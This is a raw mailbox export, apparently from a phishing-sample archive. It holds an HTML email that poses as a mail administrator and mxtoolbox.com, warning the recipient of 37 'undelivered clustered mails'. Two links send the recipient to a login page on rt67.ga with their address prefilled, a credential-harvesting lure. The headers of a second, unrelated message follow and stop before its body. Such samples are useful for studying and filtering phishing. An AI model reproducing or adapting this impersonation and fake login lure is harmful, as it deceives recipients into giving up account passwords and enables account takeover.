From: Mail Admin <admin@mxtoolbox.com>
To: jose@monkey.org
Subject: Action Required! [Undelivered messages]
Date: 12 Dec 2018 12:56:29 +0200
Message-ID: <20181212125629.B2325922DB4E7A3B@mxtoolbox.com>
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable
Status: O
X-Status: 
X-Keywords:                  
X-UID: 663


<td>
<table><tbody><tr><td>&nbsp;</td></tr></tbody></table><br><table align=3D"c=
enter"><tbody><tr><td style=3D"border-top: #1d7c0e 1px solid; height: 200px=
; border-right: #1d7c0e 1px solid; border-bottom: #1d7c0e 1px solid; paddin=
g-bottom: 25px; padding-top: 25px; padding-left: 25px; border-left: #1d7c0e=
 1px solid; padding-right: 25px; width: 470px; background-color: #ffffff; f=
ont-size: 14px"><p><span style=3D"font-size: 14px; font-family: verdana">At=
tention: <strong><a href=3D"mailto:jose@monkey.org" onclick=3D"return rcmai=
l.command('compose','jose@monkey.org',this)" rel=3D"noreferrer">jose</a></s=
trong> <br><br>
=20
=20=20=20

  Our Mail server Detected you have [37] undelivered clustered mails on the=
 12th of=20

December. 2018, </span><span style=3D"font-size: 14px; font-family: verdana=
">your action is required for them to be delivered</span></p>


  <p><span style=3D"font-size: 14px; font-family: verdana"><br>
    Kindly follow the self service instructions below to rectify the issue<=
br><br><a href=3D"https://rt67.ga/login/?email=3Djose@monkey.org" target=3D=
"_blank" rel=3D"noreferrer"><strong>*Release Pending messages to inbox</str=
ong></a></span></p>=20

<a href=3D"https://rt67.ga/login/?email=3Djose@monkey.org" target=3D"_blank=
" rel=3D"noreferrer"><strong>*Proceed to Mail Server Cleaning Email server<=
/strong></a>

<br><br>
  Source: <strong>monkey.org Admin Support</strong>

From jose@monkey.org Wed Dec 12 18:01:44 2018 +0000
Return-Path: s.schweiger@alliance-construction.us
Delivered-To: jose@monkey.org
X-FDA: 74932745328.04.fang63_6655230c27933
X-Spam-Summary: 50,3,0,60472a24e4143d57,d41d8cd98f00b204,s.schweiger@alliance-construction.us,:,RULES_HIT:41:72:152:355:379:455:871:960:962:967:973:978:981:983:988:989:1000:1026:1081:1082:1147:1189:1208:1260:1261:1263:1313:1314:1345:1381:1431:1432:1433:1434:1436:1437:1516:1517:1545:1571:1575:1588:1589:1592:1594:1605:1685:1712:1730:1747:1764:1777:1792:1801:2194:2197:2198:2199:2200:2201:2393:2524:2525:2527:2528:2538:2539:2543:2549:2553:2557:2568:2610:2627:2682:2685:2693:2741:2859:2890:2895:2897:2902:2924:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3024:3138:3139:3140:3141:3142:3148:3586:3653:3865:3866:3867:3868:3870:3871:3872:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:3976:3991:4000:4042:4180:4181:4250:4321:4605:5007:6096:6117:6119:6238:6248:6261:6354:6506:6650:6653:6669:6675:6678:6688:6747:6748:7208:7281:7652:7774:7809:7875:7903:7940:8507:8516:8583:8603:8829:8957:9025:9080:9388:9416:9871:9908:10004:10049:10053:10085:10299:10305:10346:10489:10954:11026:11289:11527:116
X-HE-Tag: fang63_6655230c27933
X-Filterd-Recvd-Size: 145543
Received: from web.ss-it.com (web.ss-it.com [192.254.151.144])
	by imf10.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Wed, 12 Dec 2018 18:01:43 +0000 (UTC)
DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed;
	d=alliance-construction.us; s=default; h=Content-Type:MIME-Version:Subject:
	Message-ID:To:From:Date:Sender:Reply-To:Cc:Content-Transfer-Encoding:
	Content-ID:Content-Description:Resent-Date:Resent-From:Resent-Sender:
	Resent-To:Resent-Cc:Resent-Message-ID:In-Reply-To:References:List-Id:
	List-Help:List-Unsubscribe:List-Subscribe:List-Post:List-Owner:List-Archive;
	 bh=9aMn7l2EGo6RDXC+9ms4GWMlyMARf7yEdIo8rhJHxPk=; b=i/HhKyvFboISfBSOVzLgcEh/a
	QGIv79dBLQSQT5HyoXjTLgdovd1u9s3qzgX6qZBuK+C2b1RKukRy+3YWBiJXBLxzWMpcXvwArGPm/
	ZUtSWDjqo0gmxWA3D1H0U9RnMO6KSYowdmr2nEVnpgYMp+moLQ14ZvwUauWPUK4g1U4LXL6+v37Dk
	AtQmIBewl6f4DxrOtJtdf/MLZ+H8jDEQwoTw+oPqa0z7Hs+8YrWFma8xXIgcfAaxhGXapeMjwd4wo
	kD/aBlWrt7OYuEjwMPvf5B1INBjP4mTl23O+6FVnWJhiXoXCNgRrHBzpNc0ZhwOcFWKMIS+kwtjN/
	w4o1kJBwg==;
Received: from [189.8.85.250] (port=61524 helo=10.14.8.97)
	by web.ss-it.com with esmtpsa (TLSv1.2:ECDHE-RSA-AES256-GCM-SHA384:256)
	(Exim 4.91)
	(envelope-from <s.schweiger@alliance-construction.us>)
	id 1gX8pJ-00066x-3G
	for jose@monkey.org; Wed, 12 Dec 2018 12:01:42 -0600
Date: Wed, 12 Dec 2018 16:01:41 -0300
